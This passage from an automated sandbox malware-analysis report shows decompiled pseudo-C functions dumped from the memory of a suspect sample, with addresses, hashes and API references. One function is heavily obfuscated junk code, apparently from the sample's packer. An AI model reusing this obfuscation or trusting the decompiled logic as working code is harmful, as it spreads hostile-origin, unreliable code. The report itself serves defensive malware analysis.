										if( *((char*)(_t70 + 2)) != 0) {
											L40:
											 *((intOrPtr*)(_t114 - 0x74)) = 0x40010006;
											 *(_t114 - 0x6c) =  *(_t114 - 0x6c) & 0x00000000;
											 *((intOrPtr*)(_t114 - 0x64)) = 2;
											 *(_t114 - 0x70) =  *(_t114 - 0x70) & 0x00000000;
											 *((intOrPtr*)(_t114 - 0x60)) = (_t99 & 0x0000ffff) + 1;
											 *((intOrPtr*)(_t114 - 0x5c)) = _t108;
											 *(_t114 - 4) = 1;
											_push(_t114 - 0x74);
											L0176DEF0(_t99, _t106);
											 *(_t114 - 4) = 0xfffffffe;
											 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
											goto L3;
										}
										__eflags = ( *0x7ffe02d4 & 0x00000003) - 3;
										if(( *0x7ffe02d4 & 0x00000003) != 3) {
											goto L40;
										}
										_push( *((intOrPtr*)(_t114 + 8)));
										_push( *((intOrPtr*)(_t114 - 0x9c)));
										_push(_t99 & 0x0000ffff);
										_push(_t108);
										_push(1);
										_t101 = E0175B280();
										__eflags =  *((char*)(_t114 + 0x14)) - 1;
										if( *((char*)(_t114 + 0x14)) == 1) {
											__eflags = _t101 - 0x80000003;
											if(_t101 == 0x80000003) {
												L0175B7E0(1);
												_t101 = 0;
												__eflags = 0;
											}
										}
										 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
										goto L4;
									}
									__eflags = _t109 - 0x80000005;
									if(_t109 == 0x80000005) {
										continue;
									}
									break;
								}
								 *(_t114 - 0x90) = 0;
								 *((intOrPtr*)(_t114 - 0x7c)) = _t89 - 1;
								_t91 = E0175E2D0(_t103, _t89 - 1,  *((intOrPtr*)(_t114 - 0x8c)),  *((intOrPtr*)(_t114 - 0x88)));
								_t115 = _t115 + 0x10;
								_t104 = _t91;
								_t92 =  *((intOrPtr*)(_t114 - 0x7c));
								__eflags = _t104;
								if(_t104 < 0) {
									L21:
									_t109 = 0x80000005;
									 *(_t114 - 0x90) = 0x80000005;
									L22:
									 *((char*)(_t92 +  *((intOrPtr*)(_t114 - 0x80)))) = 0;
									L23:
									 *(_t114 - 0x94) = _t109;
									goto L26;
								}
								__eflags = _t104 - _t92;
								if(__eflags > 0) {
									goto L21;
								}
								if(__eflags == 0) {
									goto L22;
								}
								goto L23;
							}
							goto L15;
						}
					}
					__eflags = _t109;
					if(_t109 >= 0) {
						goto L31;
					}
					__eflags = _t109 - 0x80000005;
					if(_t109 != 0x80000005) {
						goto L31;
					}
					 *((short*)(_t95 + _t108 - 2)) = 0xa;
					_t38 = _t95 - 1; // -129
					_t99 = _t38;
					goto L34;
				}
				if( *((char*)( *[fs:0x30] + 2)) != 0) {
					__eflags = __edx - 0x65;
					if(__edx != 0x65) {
						goto L2;
					}
					goto L6;
				}
				L2:
				_push( *((intOrPtr*)(_t114 + 8)));
				_push(_t106);
				if(E0175A890() != 0) {
					goto L6;
				}
				goto L3;
			}

0x0171b171
0x0171b171
0x0171b171
0x0171b171
0x0171b171
0x0171b176
0x0171b17b
0x0171b180
0x0171b186
0x0171b18f
0x0171b198
0x0171b1a4
0x0171b1aa
0x01774802
0x01774802
0x01774805
0x0177480c
0x0177480e
0x0171b1d1
0x0171b1d3
0x0171b1de
0x0171b1de
0x01774817
0x0177481e
0x01774820
0x01774822
0x01774822
0x01774824
0x01774824
0x0177482a
0x00000000
0x00000000
0x01774835
0x0177483a
0x0177483d
0x0177483f
0x01774842
0x01774842
0x01774842
0x01774846
0x0177484c
0x0177484e
0x01774851
0x01774851
0x01774853
0x01774854
0x01774854
0x01774858
0x0177485a
0x0177485a
0x0177485d
0x0177485f
0x01774861
0x01774861
0x01774866
0x0177486b
0x0177486e
0x01774871
0x01774876
0x01774876
0x01774878
0x0177487b
0x01774884
0x01774884
0x00000000
0x0177487d
0x0177487d
0x01774882
0x01774889
0x01774889
0x0177488f
0x01774891
0x017748e0
0x017748e2
0x017748e4
0x017748e4
0x017748e7
0x017748e7
0x017748ed
0x017748f4
0x017748f6
0x01774951
0x01774951
0x01774953
0x01774953
0x01774956
0x01774956
0x01774958
0x01774959
0x01774959
0x0177495d
0x0177495d
0x0177495f
0x0177495f
0x01774965
0x01774969
0x017749ba
0x017749ba
0x017749c1
0x017749c5
0x017749cc
0x017749d4
0x017749d7
0x017749da
0x017749e4
0x017749e5
0x017749f3
0x01774a02
0x00000000
0x01774a02
0x01774972
0x01774974
0x00000000
0x00000000
0x01774976
0x01774979
0x01774982
0x01774983
0x01774984
0x0177498b
0x0177498d
0x01774991
0x01774993
0x01774999
0x0177499d
0x017749a2
0x017749a2
0x017749a2
0x01774999
0x017749ac
0x00000000
0x017749b3
0x017748f8
0x017748fe
0x00000000
0x00000000
0x00000000
0x017748fe
0x01774895
0x0177489c
0x017748ad
0x017748b2
0x017748b5
0x017748b7
0x017748ba
0x017748bc
0x017748c6
0x017748c6
0x017748cb
0x017748d1
0x017748d4
0x017748d8
0x017748d8
0x00000000
0x017748d8
0x017748be
0x017748c0
0x00000000
0x00000000
0x017748c2
0x00000000
0x00000000
0x00000000
0x017748c4
0x00000000
0x01774882
0x0177487b
0x01774904
0x01774906
0x00000000
0x00000000
0x01774908
0x0177490e
0x00000000
0x00000000
0x01774910
0x01774917
0x01774917
0x00000000
0x01774917
0x0171b1ba
0x017747f9
0x017747fc
0x00000000
0x00000000
0x00000000
0x017747fc
0x0171b1c0
0x0171b1c0
0x0171b1c3
0x0171b1cb
0x00000000
0x00000000
0x00000000

APIs

_vswprintf_s.LIBCMT ref: 017748AD

Memory Dump Source

Source File: 00000000.00000002.289263472.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_16f0000_7pECKdsaig.jbxd

Similarity

API ID: _vswprintf_s
String ID:
API String ID: 677850445-0
Opcode ID: b2fc72e043c28a650a35221d5743ab0ca574f9f3fe75233f64251a4119d2980a
Instruction ID: 7202d5f0246a36b30073642059fa3c9db707c99d7acdbc40780033c1577b153b
Opcode Fuzzy Hash: b2fc72e043c28a650a35221d5743ab0ca574f9f3fe75233f64251a4119d2980a
Instruction Fuzzy Hash: A951DF71E1025A8FEF31CF68C848BAEFBB1AF05710F1141ADE85AAB286D7744941DF91

Uniqueness

Uniqueness Score: -1.00%

Function 0173B944 Relevance: 1.7, APIs: 1, Instructions: 166
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E0173B944(signed int* __ecx, char __edx) {
				signed int _v8;
				signed int _v16;
				signed int _v20;
				char _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				intOrPtr _v44;
				signed int* _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				char _v77;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t65;
				intOrPtr _t67;
				intOrPtr _t68;
				char* _t73;
				intOrPtr _t77;
				intOrPtr _t78;
				signed int _t82;
				intOrPtr _t83;
				void* _t87;
				char _t88;
				intOrPtr* _t89;
				intOrPtr _t91;
				void* _t97;
				intOrPtr _t100;
				void* _t102;
				void* _t107;
				signed int _t108;
				intOrPtr* _t112;
				void* _t113;
				intOrPtr* _t114;
				intOrPtr _t115;
				intOrPtr _t116;
				intOrPtr _t117;
				signed int _t118;
				void* _t130;

				_t120 = (_t118 & 0xfffffff8) - 0x4c;
				_v8 =  *0x180d360 ^ (_t118 & 0xfffffff8) - 0x0000004c;
				_t112 = __ecx;
				_v77 = __edx;
				_v48 = __ecx;
				_v28 = 0;
				_t5 = _t112 + 0xc; // 0x575651ff
				_t105 =  *_t5;
				_v20 = 0;
				_v16 = 0;
				if(_t105 == 0) {
					_t50 = _t112 + 4; // 0x5de58b5b
					_t60 =  *__ecx |  *_t50;
					if(( *__ecx |  *_t50) != 0) {
						 *__ecx = 0;
						__ecx[1] = 0;
						if(E01737D50() != 0) {
							_t65 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t65 = 0x7ffe0386;
						}
						if( *_t65 != 0) {
							L017E8CD6(_t112);
						}
						_push(0);
						_t52 = _t112 + 0x10; // 0x778df98b
						_push( *_t52);
						_t60 = L01759E20();
					}
					L20:
					_pop(_t107);
					_pop(_t113);
					_pop(_t87);
					return L0175B640(_t60, _t87, _v8 ^ _t120, _t105, _t107, _t113);
				}
				_t8 = _t112 + 8; // 0x8b000cc2
				_t67 =  *_t8;
				_t88 =  *((intOrPtr*)(_t67 + 0x10));
				_t97 =  *((intOrPtr*)(_t105 + 0x10)) - _t88;
				_t108 =  *(_t67 + 0x14);
				_t68 =  *((intOrPtr*)(_t105 + 0x14));
				_t105 = 0x2710;
				asm("sbb eax, edi");
				_v44 = _t88;
				_v52 = _t108;
				_t60 = L0175CE00(_t97, _t68, 0x2710, 0);
				_v56 = _t60;
				if( *_t112 != _t88 ||  *(_t112 + 4) != _t108) {
					L3:
					 *(_t112 + 0x44) = _t60;
					_t105 = _t60 * 0x2710 >> 0x20;
					 *_t112 = _t88;
					 *(_t112 + 4) = _t108;
					_v20 = _t60 * 0x2710;
					_v16 = _t60 * 0x2710 >> 0x20;
					if(_v77 != 0) {
						L16:
						_v36 = _t88;
						_v32 = _t108;
						if(E01737D50() != 0) {
							_t73 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t73 = 0x7ffe0386;
						}
						if( *_t73 != 0) {
							_t105 = _v40;
							L017E8F6A(_t112, _v40, _t88, _t108);
						}
						_push( &_v28);
						_push(0);
						_push( &_v36);
						_t48 = _t112 + 0x10; // 0x778df98b
						_push( *_t48);
						_t60 = L0175AF60();
						goto L20;
					} else {
						_t89 = 0x7ffe03b0;
						do {
							_t114 = 0x7ffe0010;
							do {
								_t77 =  *0x1808628; // 0x0
								_v68 = _t77;
								_t78 =  *0x180862c; // 0x0
								_v64 = _t78;
								_v72 =  *_t89;
								_v76 =  *((intOrPtr*)(_t89 + 4));
								while(1) {
									_t105 =  *0x7ffe000c;
									_t100 =  *0x7ffe0008;
									if(_t105 ==  *_t114) {
										goto L8;
									}
									asm("pause");
								}
								L8:
								_t89 = 0x7ffe03b0;
								_t115 =  *0x7ffe03b0;
								_t82 =  *0x7FFE03B4;
								_v60 = _t115;
								_t114 = 0x7ffe0010;
								_v56 = _t82;
							} while (_v72 != _t115 || _v76 != _t82);
							_t83 =  *0x1808628; // 0x0
							_t116 =  *0x180862c; // 0x0
							_v76 = _t116;
							_t117 = _v68;
						} while (_t117 != _t83 || _v64 != _v76);
						asm("sbb edx, [esp+0x24]");
						_t102 = _t100 - _v60 - _t117;
						_t112 = _v48;
						_t91 = _v44;
						asm("sbb edx, eax");
						_t130 = _t105 - _v52;
						if(_t130 < 0 || _t130 <= 0 && _t102 <= _t91) {
							_t88 = _t102 - _t91;
							asm("sbb edx, edi");
							_t108 = _t105;
						} else {
							_t88 = 0;
							_t108 = 0;
						}
						goto L16;
					}
				} else {
					if( *(_t112 + 0x44) == _t60) {
						goto L20;
					}
					goto L3;
				}
			}

0x0173b94c
0x0173b956
0x0173b95c
0x0173b95e
0x0173b964
0x0173b969
0x0173b96d
0x0173b96d
0x0173b970
0x0173b974
0x0173b97a
0x0173badf
0x0173badf
0x0173bae2
0x0173bae4
0x0173bae6
0x0173baf0
0x01782cb8
0x0173baf6
0x0173baf6
0x0173baf6
0x0173bafd
0x0173bb1f
0x0173bb1f
0x0173baff
0x0173bb00
0x0173bb00
0x0173bb03
0x0173bb03
0x0173bacb
0x0173bacf
0x0173bad0
0x0173bad1
0x0173badc
0x0173badc
0x0173b980
0x0173b980
0x0173b988
0x0173b98b
0x0173b98d
0x0173b990
0x0173b993
0x0173b999
0x0173b99b
0x0173b9a1
0x0173b9a5
0x0173b9aa
0x0173b9b0
0x0173b9bb
0x0173b9c0
0x0173b9c3
0x0173b9ca
0x0173b9cc
0x0173b9cf
0x0173b9d3
0x0173b9d7
0x0173ba94
0x0173ba94
0x0173ba98
0x0173baa3
0x01782ccb
0x0173baa9
0x0173baa9
0x0173baa9
0x0173bab1
0x01782cd5
0x01782cdd
0x01782cdd
0x0173babb
0x0173babc
0x0173bac2
0x0173bac3
0x0173bac3
0x0173bac6
0x00000000
0x0173b9dd
0x0173b9dd
0x0173b9e7
0x0173b9e7
0x0173b9ec
0x0173b9ec
0x0173b9f1
0x0173b9f5
0x0173b9fa
0x0173ba00
0x0173ba0c
0x0173ba10
0x0173ba10
0x0173ba12
0x0173ba18
0x00000000
0x00000000
0x0173bb26
0x0173bb26
0x0173ba1e
0x0173ba1e
0x0173ba23
0x0173ba25
0x0173ba2c
0x0173ba30
0x0173ba35
0x0173ba35
0x0173ba41
0x0173ba46
0x0173ba4c
0x0173ba50
0x0173ba54
0x0173ba6a
0x0173ba6e
0x0173ba70
0x0173ba74
0x0173ba78
0x0173ba7a
0x0173ba7c
0x0173ba8e
0x0173ba90
0x0173ba92
0x0173bb14
0x0173bb14
0x0173bb16
0x0173bb16
0x00000000
0x0173ba7c
0x0173bb0a
0x0173bb0d
0x00000000
0x00000000
0x00000000
0x0173bb0f

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0173B9A5

Memory Dump Source

Source File: 00000000.00000002.289263472.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_16f0000_7pECKdsaig.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID:
API String ID: 885266447-0
Opcode ID: de723ecd38c3e9e27dd2351c8ce0e938ce7f2dacb5b04cfcae339b29a57f695e
Instruction ID: 9f9cc541580fde1128c60e0c09d6bb4e6d222c39b3693de742ad3f518324d434
Opcode Fuzzy Hash: de723ecd38c3e9e27dd2351c8ce0e938ce7f2dacb5b04cfcae339b29a57f695e
Instruction Fuzzy Hash: 62518771A08705CFC725CF68C48492AFBE5FBC8610F14896EFA958735ADB70E940CB92

Uniqueness

Uniqueness Score: -1.00%

Function 00A9D5AD Relevance: 1.7, Strings: 1, Instructions: 416
COMMONCrypto

Download Yara Rule

C-Code - Quality: 69%

			E00A9D5AD(signed int __eax, void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi) {
				signed int _t49;

				_t49 = __eax;
				_push(__edi);
				 *0x3f8f272f =  *0x3f8f272f << 0x88;
				if( *0x3f8f272f >= 0) {
					asm("rcl dword [0xcf46d70], 0xc");
					asm("rol byte [0xca777de3], 0x6f");
					__ebp = __ebp + 1;
					asm("adc edx, [0x9ee99494]");
					__esi = __esi - 1;
					__eflags = __esi;
					if(__esi != 0) {
						goto L1;
					}
					 *0xc508c475 =  *0xc508c475 ^ __ecx;
					 *0xce2ed4d4 =  *0xce2ed4d4 | __ebp;
					 *0x51d4428 =  *0x51d4428 << 0x40;
					asm("sbb edi, [0x823161c4]");
					asm("cmpsw");
					 *0x9518560d =  *0x9518560d - __eax;
					 *0xf63bbbb7 =  *0xf63bbbb7 << 0x89;
					__esp = __esp |  *0x39426621;
					 *0x913f49f =  *0x913f49f << 0x61;
					__edx = __edx + 0xa2903bd;
					_t1 = __ebp;
					__ebp =  *0xbc01a7bc;
					 *0xbc01a7bc = _t1;
					__eflags = __esp -  *0xf985c619;
					if(__esp >  *0xf985c619) {
						goto L1;
					}
					_push(0xefa36a77);
					 *0x910e8d0 =  *0x910e8d0 | __al;
					__eflags =  *0x28ab4428 & __ah;
					if(( *0x28ab4428 & __ah) >= 0) {
						goto L1;
					}
					__esp =  *0x71b66f7d * 0x598a;
					__eflags =  *0x98cb17f4 & __esp;
					_push(0x19090a89);
					__edi = __edi | 0x1662b736;
					__eflags = __edi;
					if(__edi <= 0) {
						goto L1;
					}
					__ecx = __ecx | 0x3aa14776;
					asm("rcl dword [0x32251509], 0x39");
					asm("lodsb");
					_pop(__eax);
					asm("rcr byte [0xf5dcbf6], 0x23");
					__eflags = __eax - 0x29c20405;
					_pop(__eax);
					asm("cmpsw");
					__eflags = __dh -  *0x7556ba0a;
					__ebx = __ebx |  *0x6aa5a49c;
					asm("rcr dword [0xa3af0c2], 0xd1");
					_t6 = __ebx;
					__ebx =  *0xd8eab796;
					 *0xd8eab796 = _t6;
					asm("rcl dword [0xc281f981], 0x19");
					asm("rol dword [0xa0f3af1], 0x7");
					_push( *0xfc5717bc);
					__esp = __esp |  *0xfea5f72d;
					_push( *0x55f71dfe);
					__esi =  *0x6e12c38f;
					asm("adc al, [0xe003fba0]");
					__al = __al - 0xf9;
					__eflags = __al;
					if(__al >= 0) {
						goto L1;
					}
					asm("sbb [0xf282b173], esi");
					__ecx = __ecx + 1;
					 *0x76ddd7e1 =  *0x76ddd7e1 >> 0x12;
					asm("adc [0x2b7317f9], bl");
					asm("sbb al, [0x46bdbd0a]");
					__eax = __eax -  *0xe5caf911;
					 *0xdf1ead2 =  *0xdf1ead2 >> 0xa2;
					__ebx = __ebx +  *0x8454ab07;
					_t7 = __ecx;
					__ecx =  *0x25847d81;
					 *0x25847d81 = _t7;
					__eax = __eax +  *0xea778bd5;
					__eflags = __eax;
					asm("sbb ecx, [0x74f8b6fc]");
					if(__eax > 0) {
						goto L1;
					}
					__edi =  *0xefd8f47f * 0xce63;
					asm("lodsd");
					 *0xe8c42ac2 =  *0xe8c42ac2 - __edx;
					asm("sbb [0xcaf10b12], ah");
					asm("adc ebp, [0x7a66b326]");
					asm("ror dword [0x253d3897], 0xa5");
					 *0xf66afc6c =  *0xf66afc6c & __edi;
					_push( *0x491e290e);
					__ecx =  *0x15eea39d;
					_push( *0xc0ee480f);
					__cl =  *0xfc5310ca;
					__eflags = __esp - 0x3d68a6cd;
					asm("sbb esp, [0x21cce1c0]");
					__ecx = __ebx;
					asm("rol byte [0x829041b4], 0xc4");
					__cl =  *0xfc5310ca &  *0x2590fa84;
					 *0x8aa02bb7 =  *0x8aa02bb7 ^ __bh;
					__ebx = __ebx ^  *0x71777cc2;
					asm("ror dword [0x43bfc492], 0xaa");
					__bh = __bh -  *0xfe6d10b2;
					asm("sbb esi, [0x82f7f7]");
					__ecx =  *0x15eea39d - 1;
					asm("adc [0xbbe0db13], ebp");
					__esi = __esi &  *0x59c70bde;
					asm("rol dword [0x4c2b7191], 0xb1");
					_push( *0x139c796f);
					asm("sbb esi, 0xcb43c3ce");
					_pop(__edx);
					 *0x583a8686 =  *0x583a8686 ^ __bh;
					__eflags =  *0x583a8686;
					asm("sbb ch, [0xd91b60a0]");
					asm("scasd");
					if( *0x583a8686 != 0) {
						goto L1;
					}
					__ebp = __ebp |  *0x310bb7b;
					__esi = __esi | 0x27d517ba;
					__eflags = __esi;
					asm("adc edi, [0x13d3201b]");
					if(__esi == 0) {
						goto L1;
					}
					 *0x857d774 =  *0x857d774 & __ebx;
					__dl = __dl - 0xe3;
					__edx = __edx -  *0x517fb098;
					asm("sbb bh, [0x7945aa34]");
					asm("adc esp, [0x2c9721bd]");
					__edx =  *0x44f216a * 0xbf8;
					__eflags = __edx;
					asm("rol dword [0xab0e0985], 0x75");
					 *0xea70c6d1 =  *0xea70c6d1 >> 0xc0;
					if(__edx != 0) {
						goto L1;
					}
					asm("adc edi, 0xb0f9a7b");
					__eflags =  *0x8a3fc50b & __ebp;
					__edi = __edi - 1;
					__ebx =  *0xf972166b * 0xa86a;
					__eflags =  *0x751b6a0b & __edx;
					__ebx =  *0xf972166b * 0xa86a -  *0x1d855a67;
					__eflags = __ebx;
					if(__ebx >= 0) {
						goto L1;
					}
					__eflags =  *0xa86af973 & __esp;
					asm("adc [0x32ef860e], ebp");
					__edi = __edi + 1;
					__al = __al | 0x0000000c;
					__eflags = __al;
					if(__eflags >= 0) {
						goto L1;
					}
					asm("adc [0x2c741b71], esi");
					asm("adc [0xae94fb94], edx");
					if(__eflags != 0) {
						goto L1;
					}
					__edx = __edx - 0x971d0e7b;
					 *0xc5c114f1 =  *0xc5c114f1 << 0xf;
					_push(__eax);
					 *0xa339af6c =  *0xa339af6c << 0x92;
					__eflags = __ebx - 0x127b8606;
					asm("adc [0x6241f423], esp");
					asm("adc ah, [0xa87ba14]");
					__ecx = __ecx |  *0x7d97736f;
					asm("rol dword [0x68affee], 0xb0");
					 *0x5b127317 =  *0x5b127317 + __edi;
					__ch = __ch -  *0x3412c130;
					 *0xaf8237ba =  *0xaf8237ba >> 0x7e;
					__eflags = __esp -  *0x6fa3c53e;
					asm("sbb [0x16f984d6], esp");
					if(__esp >=  *0x6fa3c53e) {
						goto L1;
					}
					 *0x52fa0d73 = __esp;
					asm("rcl dword [0xf0747f65], 0x6f");
					__eflags =  *0x1935f9c0 & __ebx;
					__ebp = __ebp -  *0x10f4921f;
					__edx = __edx + 0xb561cbf8;
					__edi =  *0xb6439f85;
					__esi =  *0xfa93836b * 0xa3d7;
					_t16 = __ecx;
					__ecx =  *0xf61289b8;
					 *0xf61289b8 = _t16;
					 *0xef27cfa3 =  *0xef27cfa3 << 0xbf;
					 *0x61f06c95 =  *0x61f06c95 | __ebp;
					__esi =  *0xfa93836b * 0xa3d7 -  *0x413678c2;
					__eflags = __esi;
					if(__esi == 0) {
						goto L1;
					}
					__esi = __esi &  *0xee9b0f74;
					__eflags = __esi;
					if(__esi >= 0) {
						goto L1;
					}
					asm("rcr dword [0xa59b4b73], 0x22");
					__ebx = __ebx ^  *0x400c8ff8;
					asm("ror dword [0xafc7946d], 0xef");
					__eflags = __esp & 0x6bd6ff98;
					 *0xba29110c =  *0xba29110c >> 0x6f;
					__edi - 0xa90ec93f =  *0x33997dda & __ebp;
					L1();
					__eflags =  *0x810178e8 & __esp;
					_pop(__ebp);
					if(__eflags > 0) {
						goto L1;
					}
					__ebp = __ebp +  *0xa7a30077;
					__eflags =  *0x9eabd8c2 - __ebp;
					asm("adc ebp, 0x8c2309fe");
					asm("rcr byte [0x2024de8a], 0x67");
					__esp =  *0xf542e960 * 0x19ff;
					__ebx = __ebx ^  *0xdae074f4;
					__eax = __eax |  *0x2e22436e;
					__eflags = __eax;
					if(__eax != 0) {
						goto L1;
					}
					__eflags =  *0x6a15257a & __ecx;
					asm("adc [0x786d89fa], ecx");
					_push(__ebx);
					 *0xa94e49cd =  *0xa94e49cd & __ebp;
					__eflags =  *0xa94e49cd;
					if( *0xa94e49cd == 0) {
						goto L1;
					}
					__ecx = __ecx ^ 0x2d8a2c74;
					__ebp = __ebp + 1;
					_pop(__edi);
					asm("sbb [0x674eae06], esi");
					 *0x47762e1c =  *0x47762e1c >> 0xea;
					asm("adc ecx, 0xeeff039");
					__eax = 0xed0e2a39;
					__eflags = __edx - 0x6f794b6e;
					__esp = __esp ^  *0x76868917;
					_push(__ebp);
					asm("sbb bl, [0xfed9c2e0]");
					asm("adc al, 0x14");
					 *0x301aab9e =  *0x301aab9e + __edx;
					__bl = __bl ^ 0x000000b3;
					__eflags = __bl;
					if(__bl >= 0) {
						goto L1;
					}
					__eax = 0xed0e2a39 &  *0xeb9b9d73;
					__bl = __bl -  *0x41173ea0;
					__ebx = __ebx - 0x54d82394;
					__esi = __esi + 0xc5df9a81;
					 *0x84a0b7f9 =  *0x84a0b7f9 + __bl;
					__ah = __ah ^  *0x85d4d3a0;
					 *0xf5c7d2f6 =  *0xf5c7d2f6 ^ __ch;
					__eflags =  *0xf5c7d2f6;
					_push( *0xfabc0661);
					__bl = 0x20;
					 *0x70a2941d =  *0x70a2941d >> 0x9a;
					if( *0xf5c7d2f6 <= 0) {
						goto L1;
					}
					__ecx =  *0x4bf2b57e * 0x10da;
					asm("adc [0xc1365663], al");
					asm("rcl dword [0x387544db], 0x5");
					 *0xe16f4bc7 =  *0xe16f4bc7 | __ebx;
					__eflags =  *0xe16f4bc7;
					if( *0xe16f4bc7 >= 0) {
						goto L1;
					}
					__esi =  *0xe36f1a7d * 0x20b8;
					__ecx = __ecx ^  *0x9a21471d;
					__al = __al ^ 0x0000000a;
					__esi = 0xa60515f3;
					_push( *0xa74f24cd);
					__edx = __edx -  *0x3fefda05;
					asm("cmpsw");
					__ebx = __ebx ^  *0x4bf3d205;
					__ecx =  *0x3a05a764;
					__esp = __edi;
					__esi = 0xa60515f3 ^  *0x5a750f5;
					asm("sbb [0xa74ef163], cl");
					__ecx =  *0x4df2e205;
					 *0x4df2e205 =  *0x3a05a764;
					__esi = __edx;
					asm("cmpsw");
					 *0x96e58303 =  *0x96e58303 - __edi;
					 *0xc0476904 =  *0xc0476904 << 0xe9;
					 *0xc2750464 =  *0xc2750464 << 4;
					asm("rcl dword [0xc70464c7], 0xee");
					_t26 = __esp;
					__esp =  *0x464bd98;
					 *0x464bd98 = _t26;
					__eflags =  *0x64bf992c - __dh;
					asm("adc eax, 0x46ef1d05");
					__ebx =  *0xcd05a76a * 0x5923;
					_push( *0x3405a764);
					__eflags = __ecx & 0xa7625001;
					 *0x9c652107 =  *0x9c652107 >> 0xa;
					 *0x4b01fcee =  *0x4b01fcee << 0xa;
					 *0xd68a1707 =  *0xd68a1707 >> 0xe;
					 *0x4bff0111 & __edi = 0xffffffff84051403;
					__esi = 0xa60515f3 ^  *0x5a750f5 |  *0x4b050feb;
					__eflags =  *0x41c20507 - __edi;
					 *0x4bfd5284 =  *0x4bfd5284 >> 0x76;
					__eflags = __ch -  *0x930d9f08;
					__cl = __cl ^ 0x000000c6;
					__ebx =  *0xcd05a76a * 0x5923 -  *0x1d6cfddd;
					__ch = __ch | 0x00000008;
					__esi = (0xa60515f3 ^  *0x5a750f5 |  *0x4b050feb) +  *0xb0085bd;
					__dl = __dl -  *0x1d66d0b0;
					asm("sbb bh, [0xe2c97308]");
					_t33 = __edx;
					__edx =  *0x73f3f20e;
					 *0x73f3f20e = _t33;
					__eflags =  *0x75ad081d - __edi;
					asm("rcl byte [0xac8cf9e0], 0x57");
					_pop(__edx);
					asm("adc [0xd702091d], ebx");
					__eax = __eax ^ 0x41255b31;
					__dh = __dh;
					_t34 = __ecx;
					__ecx =  *0x49090f87;
					 *0x49090f87 = _t34;
					__esp =  *0x464bd98 - 0x8b97860d;
					__eflags =  *0xf8f031d & __edi;
					__esi = 0xcf38d09;
					 *0xfa19b002 =  *0xfa19b002 - __bh;
					__esp =  *0x464bd98 - 0x8b97860d | 0xc30a0f8c;
					asm("sbb edx, 0x6ea279ed");
					__edx =  *0x73f3f20e &  *0xde775cdf;
					 *0xaee20b3a =  *0xaee20b3a - __cl;
					asm("adc [0xc5db452f], esi");
					asm("sbb bl, 0xd2");
					 *0xa8af4b68 =  *0xa8af4b68 + __ebx;
					asm("rol byte [0x17d72708], 0xe4");
					__eax =  *0x72f1f63d;
					__ecx =  *0x3913111d;
					 *0x81ed07a0 =  *0x81ed07a0 ^ __bh;
					__eflags =  *0x81ed07a0;
					 *0x61ef05e6 =  *0x61ef05e6 >> 0xb9;
					__esi = 0xeaaa4bdc;
					if( *0x81ed07a0 < 0) {
						goto L1;
					}
					__eflags =  *0x14549472 - __eax;
					asm("adc ecx, [0xd293598f]");
					if( *0x14549472 != __eax) {
						goto L1;
					}
					 *0x8631807a =  *0x8631807a + __edx;
					__ecx = 0xe02e0a3e;
					_push(__ebx);
					__eflags =  *0xd5c56cc5 & __eax;
					_push( *0x12c71bea);
					_push( *0x433b0cea);
					asm("rol byte [0x621a60e0], 0x40");
					asm("adc edx, [0x8ac77606]");
					__eflags = __esp - 0x7cc40fe;
					 *0xfd0b730d = __eax;
					__ebx -  *0x183218d1 = __edx & 0x2bafe135;
					asm("adc edx, [0x5806a89a]");
					if((__edx & 0x2bafe135) > 0) {
						goto L1;
					}
					__esi = 0xeaaa4bdc |  *0x9f16b377;
					__bl = 0;
					 *0x929ec60c =  *0x929ec60c & __bh;
					_pop( *0x3e05d1f0);
					__ebp = __ebp + 1;
					__bh = __bh &  *0x7c42ae7;
					__eax = __eax + 0xf4d9ad06;
					__eflags =  *0x164bc2cb & 0xe02e0a3e;
					 *0xc59f0ef9 =  *0xc59f0ef9 >> 0x7a;
					 *0x9674e66d =  *0x9674e66d << 0x2d;
					 *0xec95919d =  *0xec95919d >> 0xdd;
					__eflags =  *0xe9bef314 & __bh;
					__ebp = __ebp ^  *0xa6bfe2f;
					__eflags = __edi -  *0x1711bcce;
					 *0x768252cb = __edx;
					asm("adc al, [0x2500c5f6]");
					__ecx = 0xe02e0a3e &  *0x466980c1;
					asm("rol dword [0x5451b3d3], 0xcc");
					__ch = __ch - 0x1c;
					 *0x4ff72601 =  *0x4ff72601 & __esp;
					__eflags =  *0x4ff72601;
					__bl =  *0x987cb020;
					if( *0x4ff72601 <= 0) {
						goto L1;
					}
					 *0xe9c9376 =  *0xe9c9376 | __ebp;
					 *0x7bda4f4 =  *0x7bda4f4 >> 0x27;
					 *0xec9cfbc =  *0xec9cfbc >> 7;
					__eflags = __ebx - 0x4cc0599b;
					__eax = __eax + 1;
					 *0x10a2d362 =  *0x10a2d362 >> 5;
					__eflags =  *0x85814e8f - 0xeaaa4bdc;
					_pop(__edx);
					__ecx = 0xed012f6e;
					_push(__eax);
					__edi = __edi + 0xe0d83ece;
					__edx = __edx &  *0x2d2289fe;
					__ah = __ah ^ 0x000000d2;
					__eflags = __ah;
					asm("rcr dword [0x86ea15d1], 0xa6");
					if(__ah < 0) {
						goto L1;
					}
					__eax = __eax +  *0x811e6070;
					 *0x87301a28 =  *0x87301a28 >> 0xd6;
					asm("adc al, 0x3c");
					asm("scasb");
					__ch = __ch | 0x000000b6;
					asm("rol byte [0xa1875e14], 0xed");
					__al = __al ^  *0xf7899518;
